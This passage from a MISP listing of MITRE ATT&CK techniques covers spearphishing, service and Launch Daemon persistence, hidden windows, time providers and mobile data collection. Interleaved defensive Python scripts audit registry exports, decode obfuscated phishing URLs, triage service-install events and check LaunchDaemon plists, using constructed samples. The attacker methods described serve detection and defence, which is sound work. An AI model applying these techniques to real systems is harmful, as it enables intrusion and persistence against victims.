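# Assumed baselines: msv1_0 is the stock LSA package on a workstation, and the
# Security log normally lives under %SystemRoot%\System32\Winevt\Logs.
EXPECTED_AUTH_PACKAGES = {"msv1_0"}
EXPECTED_SECLOG_FILE = r"%systemroot%\system32\winevt\logs\security.evtx"

# Constructed sample export (reg.exe /e style); not taken from a real system.
SAMPLE_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
"svc_backup"=dword:00000000
"helpdesk"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"Authentication Packages"=hex(7):6d,00,73,00,76,00,31,00,5f,00,30,00,00,00,65,00,78,00,\
  74,00,72,00,61,00,5f,00,70,00,6b,00,67,00,00,00,00,00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security]
"File"="C:\\Windows\\Temp\\sec_backup.evtx"
'''

_VALUE_RE = re.compile(r'^(?:"((?:[^"\\]|\\.)*)"|@)=(.*)$')


def decode_value(data: str):
    """Decode the .reg encodings of REG_SZ, REG_DWORD and REG_MULTI_SZ (hex(7));
    any other type is returned as the raw text."""
    if data.startswith('"') and data.endswith('"'):
        return data[1:-1].replace('\\\\', '\\').replace('\\"', '"')
    if data.startswith("dword:"):
        return int(data[6:], 16)
    if data.startswith("hex(7):"):
        raw = bytes(int(b, 16) for b in data[7:].split(",") if b)
        return [s for s in raw.decode("utf-16-le").split("\x00") if s]
    return data


def parse_reg_export(text: str) -> dict:
    """Parse a .reg export into {key path: {value name: decoded value}},
    joining the backslash-continued lines that long hex values are split into."""
    keys, current, pending = {}, None, ""
    for raw_line in text.splitlines():
        line = pending + raw_line.strip()
        pending = ""
        if line.endswith("\\"):
            pending = line[:-1]
            continue
        if not line or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
            continue
        m = _VALUE_RE.match(line)
        if m and current is not None:
            name = "@" if m.group(1) is None else m.group(1).replace('\\\\', '\\')
            keys[current][name] = decode_value(m.group(2))
    return keys


def audit(keys: dict) -> list:
    """Findings for hidden accounts, extra authentication packages and a moved Security log."""
    findings = []
    for user, flag in keys.get(USERLIST_KEY, {}).items():
        if flag == 0:
            findings.append(f"hidden logon account: {user} (UserList value 0)")
    for pkg in keys.get(LSA_KEY, {}).get("Authentication Packages", []):
        if pkg.lower() not in EXPECTED_AUTH_PACKAGES:
            findings.append(f"unexpected LSA authentication package: {pkg}")
    seclog = keys.get(SECLOG_KEY, {}).get("File")
    if seclog is not None and seclog.lower() != EXPECTED_SECLOG_FILE:
        findings.append(f"Security event log File value points to: {seclog}")
    return findings


if __name__ == "__main__":
    for finding in audit(parse_reg_export(SAMPLE_EXPORT)):
        print(finding)
```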

The tag is: misp-galaxy:mitre-attack-pattern="Indicator Blocking - T1562.006"

Table 6116. Table References

Links

https://attack.mitre.org/techniques/T1562/006

https://docs.microsoft.com/en-us/windows/desktop/etw/consuming-events

https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63

https://ptylu.github.io/content/report/report.html?report=25

https://www.crowdstrike.com/blog/lemonduck-botnet-targets-docker-for-cryptomining-operations/

https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=Backdoor:Win32/Lamin.A

Spearphishing Link - T1566.002

Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs links in the email to download malware, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.

All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https://attack.mitre.org/techniques/T1204). The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place.

Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly. Additionally, adversaries may use seemingly benign links that abuse special characters to mimic legitimate websites (known as an "IDN homograph attack").(Citation: CISA IDN ST05-016) URLs may also be obfuscated by taking advantage of quirks in the URL schema, such as the acceptance of integer- or hexadecimal-based hostname formats and the automatic discarding of text before an “@” symbol: for example, hxxp://google.com@1157586937.(Citation: Mandiant URL Obfuscation 2023)
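For the URL schema tricks just described, the following added example (not code from MITRE, Mandiant or MISP) shows the analysis a mail filter or analyst tooling can apply: it separates the decoy text before “@” from the host the browser will actually contact, and converts a bare integer or hexadecimal host back to a dotted-quad address so the <code>google.com@1157586937</code> case resolves to its real destination.

```python
"""Recover the real destination of a URL obfuscated the way described above:
text before '@' that impersonates a trusted domain (browsers discard it as
userinfo) and a host written as a bare decimal or hexadecimal integer.

Added example for illustration; not code from MITRE, Mandiant or MISP.
"""
import ipaddress
from urllib.parse import urlsplit

# Defanged scheme spellings used in reports, mapped back to the real scheme.
_DEFANG = {"hxxp": "http", "hxxps": "https"}


def decode_host(host: str) -> str:
    """Dotted-quad form of a decimal or 0x-prefixed hex host; other hosts unchanged."""
    h = host.lower()
    try:
        if h.startswith("0x"):
            return str(ipaddress.IPv4Address(int(h, 16)))
        if h.isdigit():
            return str(ipaddress.IPv4Address(int(h, 10)))
    except ValueError:  # ipaddress.AddressValueError is a ValueError subclass
        pass
    return h


def analyze_url(url: str) -> dict:
    """Split a URL and report the decoy userinfo, the decoded host and the tricks used."""
    parts = urlsplit(url.strip())
    scheme = parts.scheme.lower()
    hostname = parts.hostname or ""
    real_host = decode_host(hostname)
    uses_userinfo = parts.username is not None
    numeric_host = real_host != hostname
    return {
        "scheme": _DEFANG.get(scheme, scheme),
        "decoy": parts.username,   # what a reader sees first; the browser ignores it
        "host": real_host,         # where the request actually goes
        "uses_userinfo": uses_userinfo,
        "numeric_host": numeric_host,
        "suspicious": uses_userinfo or numeric_host,
    }


if __name__ == "__main__":
    print(analyze_url("hxxp://google.com@1157586937"))
```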

Adversaries may also utilize links to perform consent phishing, typically with OAuth 2.0 request URLs that when accepted by the user provide permissions/access for malicious applications, allowing adversaries to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: Trend Micro Pawn Storm OAuth 2017) These stolen access tokens allow the adversary to perform various actions on behalf of the user via API calls. (Citation: Microsoft OAuth 2.0 Consent Phishing 2021)

The tag is: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002"

Table 6117. Table References

Links

https://attack.mitre.org/techniques/T1566/002

https://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-abuses-open-authentication-advanced-social-engineering-attacks

https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide

https://us-cert.cisa.gov/ncas/tips/ST05-016

https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf

https://www.mandiant.com/resources/blog/url-obfuscation-schema-abuse

https://www.microsoft.com/security/blog/2021/07/14/microsoft-delivers-comprehensive-solution-to-battle-rise-in-consent-phishing-emails/

Email Accounts - T1586.002

Adversaries may compromise email accounts that can be used during targeting. Adversaries can use compromised email accounts to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598), [Phishing](https://attack.mitre.org/techniques/T1566), or large-scale spam email campaigns. Utilizing an existing persona with a compromised email account may engender a level of trust in a potential victim if they have a relationship with, or knowledge of, the compromised persona. Compromised email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)).

A variety of methods exist for compromising email accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, brute forcing credentials (ex: password reuse from breach credential dumps), or paying employees, suppliers or business partners for access to credentials.(Citation: AnonHBGary)(Citation: Microsoft DEV-0537) Prior to compromising email accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. Adversaries may target well-known email accounts or domains, from which malicious spam or [Phishing](https://attack.mitre.org/techniques/T1566) emails may evade reputation-based email filtering rules.

Adversaries can use a compromised email account to hijack existing email threads with targets of interest.

The tag is: misp-galaxy:mitre-attack-pattern="Email Accounts - T1586.002"

Table 6118. Table References

Links

https://arstechnica.com/tech-policy/2011/02/anonymous-speaks-the-inside-story-of-the-hbgary-hack/

https://attack.mitre.org/techniques/T1586/002

https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/

Service Execution - T1569.002

Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (<code>services.exe</code>) is an interface to manage and manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is accessible to users via GUI components as well as system utilities such as <code>sc.exe</code> and [Net](https://attack.mitre.org/software/S0039).

[PsExec](https://attack.mitre.org/software/S0029) can also be used to execute commands or payloads via a temporary Windows service created through the service control manager API.(Citation: Russinovich Sysinternals) Tools such as [PsExec](https://attack.mitre.org/software/S0029) and <code>sc.exe</code> can accept remote servers as arguments and may be used to conduct remote execution.

Adversaries may leverage these mechanisms to execute malicious content. This can be done by executing either a new or a modified service. This technique is the execution used in conjunction with [Windows Service](https://attack.mitre.org/techniques/T1543/003) during service persistence or privilege escalation.

The tag is: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002"

Table 6119. Table References

Links

https://attack.mitre.org/techniques/T1569/002

https://docs.microsoft.com/windows/win32/services/service-control-manager

https://technet.microsoft.com/en-us/sysinternals/bb897553.aspx

Email Addresses - T1589.002

Adversaries may gather email addresses that can be used during targeting. Even if internal instances exist, organizations may have public-facing email infrastructure and addresses for employees.

Adversaries may easily gather email addresses, since they may be readily available and exposed via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: HackersArise Email)(Citation: CNET Leaks) Email addresses could also be enumerated via more active means (i.e. [Active Scanning](https://attack.mitre.org/techniques/T1595)), such as probing and analyzing responses from authentication services that may reveal valid usernames in a system.(Citation: GrimBlog UsernameEnum) For example, adversaries may be able to enumerate email addresses in Office 365 environments by querying a variety of publicly available API endpoints, such as autodiscover and GetCredentialType.(Citation: GitHub Office 365 User Enumeration)(Citation: Azure Active Directory Reconnaisance)

Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Email Accounts](https://attack.mitre.org/techniques/T1586/002)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Brute Force](https://attack.mitre.org/techniques/T1110) via [External Remote Services](https://attack.mitre.org/techniques/T1133)).

The tag is: misp-galaxy:mitre-attack-pattern="Email Addresses - T1589.002"

Table 6120. Table References

Links

https://attack.mitre.org/techniques/T1589/002

https://github.com/gremwell/o365enum

https://grimhacker.com/2017/07/24/office365-activesync-username-enumeration/

https://o365blog.com/post/just-looking/

https://www.cnet.com/news/massive-breach-leaks-773-million-emails-21-million-passwords/

https://www.hackers-arise.com/email-scraping-and-maltego

Spearphishing Attachment - T1598.002

Adversaries may send spearphishing messages with a malicious attachment to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.

All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon the recipient populating information then returning the file.(Citation: Sophos Attachment)(Citation: GitHub Phishery) The text of the spearphishing email usually tries to give a plausible reason why the file should be filled-in, such as a request for information from a business associate. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.

The tag is: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1598.002"

Table 6121. Table References

Links

https://attack.mitre.org/techniques/T1598/002

https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide

https://github.com/ryhanson/phishery

https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/

https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf

Windows Service - T1543.003

Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.(Citation: TechNet Services) Windows service configuration information, including the file path to the service’s executable or recovery programs/commands, is stored in the Windows Registry.

Adversaries may install a new service or modify an existing service to execute at startup in order to persist on a system. Service configurations can be set or modified using system utilities (such as sc.exe), by directly modifying the Registry, or by interacting directly with the Windows API.

Adversaries may also use services to install and execute malicious drivers. For example, after dropping a driver file (ex: .sys) to disk, the payload can be loaded and registered via [Native API](https://attack.mitre.org/techniques/T1106) functions such as CreateServiceW() (or manually via functions such as ZwLoadDriver() and ZwSetValueKey()), by creating the required service Registry values (i.e. [Modify Registry](https://attack.mitre.org/techniques/T1112)), or by using command-line utilities such as PnPUtil.exe.(Citation: Symantec W.32 Stuxnet Dossier)(Citation: Crowdstrike DriveSlayer February 2022)(Citation: Unit42 AcidBox June 2020) Adversaries may leverage these drivers as [Rootkit](https://attack.mitre.org/techniques/T1014)s to hide the presence of malicious activity on a system. Adversaries may also load a signed yet vulnerable driver onto a compromised machine (known as "Bring Your Own Vulnerable Driver" (BYOVD)) as part of [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).(Citation: ESET InvisiMole June 2020)(Citation: Unit42 AcidBox June 2020)

Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1569/002). To make detection analysis more challenging, malicious services may also incorporate [Masquerade Task or Service](https://attack.mitre.org/techniques/T1036/004) (ex: using a service and/or payload name related to a legitimate OS or benign software component).
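The references for this entry point to Security event 4697 ("A service was installed in the system"). As an added example, not part of the ATT&CK or MISP text, the script below parses a constructed 4697 event and tags the patterns described above: a service image in a user-writable location, a script host as the image, and a kernel driver registered through the service control manager. The XML structure and field names (ServiceName, ServiceFileName, ServiceType, ServiceStartType, ServiceAccount) are those the real event carries; the values are made up.

```python
"""Triage Windows Security event 4697 for service-persistence red flags.
Added example; event XML below is constructed, not captured."""
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
TRUSTED_IMAGE_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\",
                      "c:\\program files\\", "c:\\program files (x86)\\")
DRIVER_DIR = "c:\\windows\\system32\\drivers\\"
USER_WRITABLE_MARKERS = ("\\users\\", "\\temp\\", "\\programdata\\", "\\appdata\\", "\\perflogs\\")
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "msiexec.exe"}
KERNEL_DRIVER_TYPES = {0x1, 0x2}   # SERVICE_KERNEL_DRIVER, SERVICE_FILE_SYSTEM_DRIVER


def _num(text: str) -> int:
    """4697 logs ServiceType as hex ("0x10") and ServiceStartType as decimal ("2")."""
    return int(text, 16) if text.lower().startswith("0x") else int(text)


def parse_4697(xml_text: str) -> dict:
    """Flatten the EventData <Data Name=...> elements into a dict."""
    root = ET.fromstring(xml_text)
    if root.findtext("e:System/e:EventID", namespaces=NS) != "4697":
        raise ValueError("not a 4697 event")
    ev = {d.get("Name"): (d.text or "") for d in root.findall("e:EventData/e:Data", NS)}
    ev["ServiceType"] = _num(ev.get("ServiceType", "0"))
    ev["ServiceStartType"] = _num(ev.get("ServiceStartType", "0"))
    return ev


def image_path(service_file_name: str) -> str:
    """Pull the executable out of ServiceFileName (drop arguments) and canonicalise
    the prefixes drivers and services commonly use (\\??\\, \\SystemRoot\\, system32\\)."""
    s = service_file_name.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        exe = s[1:end] if end > 0 else s[1:]
    else:
        exe = s.split(" ", 1)[0]
    exe = exe.lower()
    if exe.startswith("\\??\\"):
        exe = exe[4:]
    for prefix, root in (("%systemroot%\\", "c:\\windows\\"),
                         ("\\systemroot\\", "c:\\windows\\"),
                         ("system32\\", "c:\\windows\\system32\\")):
        if exe.startswith(prefix):
            exe = root + exe[len(prefix):]
            break
    return exe


def triage_4697(xml_text: str) -> dict:
    """Return the service facts an analyst needs plus a list of review tags."""
    ev = parse_4697(xml_text)
    exe = image_path(ev.get("ServiceFileName", ""))
    base = exe.rsplit("\\", 1)[-1]
    tags = []
    if ev["ServiceType"] in KERNEL_DRIVER_TYPES and not exe.startswith(DRIVER_DIR):
        tags.append("driver-outside-drivers-dir")      # driver loaded via the SCM from an odd place
    if base in SCRIPT_HOSTS:
        tags.append("script-host-image")               # service is really a cmd/powershell one-liner
    if any(m in exe for m in USER_WRITABLE_MARKERS):
        tags.append("user-writable-image")             # a non-admin could have planted the binary
    if not exe.startswith(TRUSTED_IMAGE_DIRS):
        tags.append("non-standard-image-dir")
    return {"service": ev.get("ServiceName"), "image": exe, "account": ev.get("ServiceAccount"),
            "installer": ev.get("SubjectUserName"), "start_type": ev["ServiceStartType"], "tags": tags}


def _event(name: str, image: str, stype: str, start: str, account: str = "LocalSystem") -> str:
    """Build a constructed 4697 event with the real field names."""
    return f"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4697</EventID><Computer>WS01.corp.example</Computer></System>
  <EventData>
    <Data Name="SubjectUserName">jdoe</Data>
    <Data Name="ServiceName">{name}</Data>
    <Data Name="ServiceFileName">{image}</Data>
    <Data Name="ServiceType">{stype}</Data>
    <Data Name="ServiceStartType">{start}</Data>
    <Data Name="ServiceAccount">{account}</Data>
  </EventData>
</Event>"""


# Constructed samples: a masquerading name with a user-writable image, a normal
# svchost-hosted service, and a kernel driver dropped outside the drivers folder.
ROGUE_SERVICE_EVENT = _event("WindowsUpdateSvc", "C:\\Users\\Public\\Libraries\\wuasvc.exe", "0x10", "2")
BENIGN_SERVICE_EVENT = _event("wuauserv", "%SystemRoot%\\System32\\svchost.exe -k netsvcs", "0x20", "3")
DRIVER_EVENT = _event("drv0", "\\??\\C:\\Users\\Public\\drv.sys", "0x1", "1")

if __name__ == "__main__":
    for sample in (ROGUE_SERVICE_EVENT, BENIGN_SERVICE_EVENT, DRIVER_EVENT):
        print(triage_4697(sample))
```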

The tag is: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003"

Table 6122. Table References

Links

https://attack.mitre.org/techniques/T1543/003

https://docs.microsoft.com/windows/security/threat-protection/auditing/event-4697

https://docs.microsoft.com/windows/security/threat-protection/use-windows-event-forwarding-to-assist-in-intrusion-detection

https://technet.microsoft.com/en-us/library/cc772408.aspx

https://technet.microsoft.com/en-us/sysinternals/bb963902

https://unit42.paloaltonetworks.com/acidbox-rare-malware/

https://www.crowdstrike.com/blog/how-crowdstrike-falcon-protects-against-wiper-malware-used-in-ukraine-attacks/

https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf

https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf

Code Repositories - T1593.003

Adversaries may search public code repositories for information about victims that can be used during targeting. Victims may store code in repositories on various third-party websites such as GitHub, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git.

Adversaries may search various public code repositories for information about a victim. Public code repositories are often a source of general information about victims, such as commonly used programming languages and libraries as well as the names of employees. Adversaries may also identify more sensitive data, including accidentally leaked credentials or API keys.(Citation: GitHub Cloud Service Credentials) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Valid Accounts](https://attack.mitre.org/techniques/T1078) or [Phishing](https://attack.mitre.org/techniques/T1566)).

Note: This is distinct from [Code Repositories](https://attack.mitre.org/techniques/T1213/003), which focuses on [Collection](https://attack.mitre.org/tactics/TA0009) from private and internally hosted code repositories.

The tag is: misp-galaxy:mitre-attack-pattern="Code Repositories - T1593.003"

Table 6123. Table References

Links

https://attack.mitre.org/techniques/T1593/003

https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/

Contact List - T1636.003

Adversaries may utilize standard operating system APIs to gather contact list data. On Android, this can be accomplished using the Contacts Content Provider. On iOS, this can be accomplished using the Contacts framework.

If the device has been jailbroken or rooted, an adversary may be able to access the [Contact List](https://attack.mitre.org/techniques/T1636/003) without the user’s knowledge or approval.

The tag is: misp-galaxy:mitre-attack-pattern="Contact List - T1636.003"

Table 6124. Table References

Links

https://attack.mitre.org/techniques/T1636/003

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-13.html

Launch Daemon - T1543.004

Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in <code>/System/Library/LaunchDaemons/</code> and <code>/Library/LaunchDaemons/</code>. Required Launch Daemons parameters include a <code>Label</code> to identify the task, <code>Program</code> to provide a path to the executable, and <code>RunAtLoad</code> to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)

Adversaries may install a Launch Daemon configured to execute at startup by using the <code>RunAtLoad</code> parameter set to <code>true</code> and the <code>Program</code> parameter set to the malicious executable path. The daemon name may be disguised by using a name from a related operating system or benign software (i.e. [Masquerading](https://attack.mitre.org/techniques/T1036)). When the Launch Daemon is executed, the program inherits administrative permissions.(Citation: WireLurker)(Citation: OSX Malware Detection)

Additionally, system configuration changes (such as the installation of third-party package management software) may cause folders such as <code>/usr/local/bin</code> to become globally writable. Such poor configurations can allow an adversary to modify executables referenced by existing Launch Daemons' plist files.(Citation: LaunchDaemon Hijacking)(Citation: sentinelone macos persist Jun 2019)
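The two risks described above (a RunAtLoad daemon whose Program points outside Apple or vendor directories, possibly behind a com.apple.* style Label, and a Program sitting in a directory that has become world-writable) can be audited from the plist alone. The following is an added example, not code from the ATT&CK or MISP projects; the plists are constructed and the directory-permission input is injected so the check runs offline, with a live scanner for a real /Library/LaunchDaemons folder.

```python
"""Audit LaunchDaemon plists for the persistence and hijacking patterns above.
Added example; sample plists are constructed."""
import os
import plistlib
import stat

# Where a root-run daemon's executable is normally expected to live.
TRUSTED_DIRS = ("/System/", "/usr/bin/", "/usr/sbin/", "/usr/libexec/", "/bin/", "/sbin/", "/Library/Apple/")
# Where anything carrying an Apple-style Label should live.
APPLE_DIRS = ("/System/", "/usr/bin/", "/usr/sbin/", "/usr/libexec/", "/Library/Apple/")


def program_of(job: dict) -> str:
    """launchd runs Program if present, otherwise ProgramArguments[0]."""
    if job.get("Program"):
        return job["Program"]
    args = job.get("ProgramArguments") or []
    return args[0] if args else ""


def audit_daemon(plist_bytes: bytes, world_writable_dirs=frozenset()) -> list:
    """Return human-readable findings for one LaunchDaemon plist. Findings are
    review prompts: a legitimate third-party daemon can trigger the first one."""
    job = plistlib.loads(plist_bytes)
    label = job.get("Label", "<no Label>")
    program = program_of(job)
    findings = []
    if job.get("RunAtLoad") is True and not program.startswith(TRUSTED_DIRS):
        findings.append(f"{label}: RunAtLoad job executes {program} outside trusted directories")
    if label.startswith("com.apple.") and not program.startswith(APPLE_DIRS):
        findings.append(f"{label}: Apple-style Label but program is not in an Apple directory")
    if os.path.dirname(program) in world_writable_dirs:
        findings.append(f"{label}: {os.path.dirname(program)} is world-writable, executable can be swapped")
    return findings


def world_writable_parents(paths) -> set:
    """Live check: parent directories of the given executables that grant o+w."""
    out = set()
    for p in paths:
        d = os.path.dirname(p)
        try:
            if stat.S_IMODE(os.stat(d).st_mode) & stat.S_IWOTH:
                out.add(d)
        except FileNotFoundError:
            pass
    return out


def scan_launch_daemons(directory: str = "/Library/LaunchDaemons") -> list:
    """Walk a LaunchDaemons folder on a real host and audit every plist."""
    findings = []
    for name in sorted(os.listdir(directory)):
        if not name.endswith(".plist"):
            continue
        with open(os.path.join(directory, name), "rb") as fh:
            data = fh.read()
        findings += audit_daemon(data, world_writable_parents([program_of(plistlib.loads(data))]))
    return findings


# Constructed: Apple-looking label, RunAtLoad, program in /usr/local/bin.
SUSPICIOUS_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0"><dict>
  <key>Label</key><string>com.apple.softwareupdated.helper</string>
  <key>Program</key><string>/usr/local/bin/swupdated</string>
  <key>RunAtLoad</key><true/>
</dict></plist>"""

# Constructed: third-party label, binary in a vendor directory.
BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.backupd</string>
  <key>ProgramArguments</key><array><string>/usr/sbin/backupd</string><string>--daemon</string></array>
  <key>RunAtLoad</key><true/>
</dict></plist>"""

if __name__ == "__main__":
    for line in audit_daemon(SUSPICIOUS_PLIST, {"/usr/local/bin"}):
        print(line)
```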

The tag is: misp-galaxy:mitre-attack-pattern="Launch Daemon - T1543.004"

Table 6125. Table References

Links

https://attack.mitre.org/techniques/T1543/004

https://bradleyjkemp.dev/post/launchdaemon-hijacking/

https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html

https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf

https://www.real-world-systems.com/docs/launchdPlist.1.html

https://www.sentinelone.com/blog/how-malware-persists-on-macos/

https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf

https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf

Hidden Window - T1564.003

Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks.

On Windows, scripting languages such as [PowerShell](https://attack.mitre.org/techniques/T1059/001), JScript, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005) provide features to hide windows. One example of this is <code>powershell.exe -WindowStyle Hidden</code>.(Citation: PowerShell About 2019)

Similarly, on macOS the configurations for how applications run are listed in property list (plist) files. One of the tags in these files can be <code>apple.awt.UIElement</code>, which allows for Java applications to prevent the application’s icon from appearing in the Dock. A common use for this is when applications run in the system tray, but don’t also want to show up in the Dock.

Adversaries may abuse these functionalities to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.(Citation: Antiquated Mac Malware)

The tag is: misp-galaxy:mitre-attack-pattern="Hidden Window - T1564.003"

Table 6126. Table References

Links

https://attack.mitre.org/techniques/T1564/003

https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/

https://docs.microsoft.com/en-us/powershell/module/Microsoft.PowerShell.Core/About/about_PowerShell_exe?view=powershell-5.1

Time Providers - T1547.003

Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains.(Citation: Microsoft W32Time Feb 2018) W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients.(Citation: Microsoft TimeProvider)

Time providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of <code>HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\</code>.(Citation: Microsoft TimeProvider) The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed.(Citation: Microsoft TimeProvider)

Adversaries may abuse this architecture to establish persistence, specifically by registering and enabling a malicious DLL as a time provider. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account.(Citation: Github W32Time Oct 2017)

The tag is: misp-galaxy:mitre-attack-pattern="Time Providers - T1547.003"

Table 6127. Table References

Links

https://attack.mitre.org/techniques/T1547/003

https://docs.microsoft.com/windows-server/networking/windows-time-service/windows-time-service-tools-and-settings

https://docs.microsoft.com/windows-server/networking/windows-time-service/windows-time-service-top

https://github.com/scottlundgren/w32time

https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx

https://technet.microsoft.com/en-us/sysinternals/bb963902

SMS Messages - T1636.004

Adversaries may utilize standard operating system APIs to gather SMS messages. On Android, this can be accomplished using the SMS Content Provider. iOS provides no standard API to access SMS messages.

If the device has been jailbroken or rooted, an adversary may be able to access [SMS Messages](https://attack.mitre.org/techniques/T1636/004) without the user’s knowledge or approval.

The tag is: misp-galaxy:mitre-attack-pattern="SMS Messages - T1636.004"

Table 6128. Table References

Links

https://attack.mitre.org/techniques/T1636/004

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-13.html

DHCP Spoofing - T1557.003

